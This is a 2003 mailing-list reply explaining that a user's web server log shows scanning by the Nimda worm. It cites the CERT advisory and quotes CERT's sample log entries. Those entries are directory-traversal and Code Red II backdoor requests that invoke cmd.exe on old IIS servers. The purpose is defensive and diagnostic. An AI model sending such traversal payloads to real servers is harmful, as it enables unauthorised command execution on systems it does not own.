It seams like your system is exposed for an old worm named "Nimda".
(And I think you should follow another authors advivice and do a reverse lookup on the IP# and contact the domain owner about this incident.) Check out http://www.cert.org/advisories/CA-2001-26.html for more information and how to protect you. Your system should be patched for this since this worm was around 2002 or something, but if not, do download and install the securit patch. CERT: System FootPrint The scanning activity of the Nimda worm produces the following log entries for any web server listing on port 80/tcp: GET /scripts/root.exe?/c+dir GET /MSADC/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/sy stem32/cmd.exe?/c+dir GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir Note: The first four entries in these sample logs denote attempts to connect to the backdoor left by Code Red II, while the remaining log entries are examples of exploit attempts for the Directory Traversal vulnerability. //Anders -----Original Message----- From: jsWalter To: [EMAIL PROTECTED] Sent: 10-8-03 21:48 Subject: [PHP-WIN] Hack Q... Is someone trying to hack my computer? "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" Any idea what this means? walter -- PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php -- PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
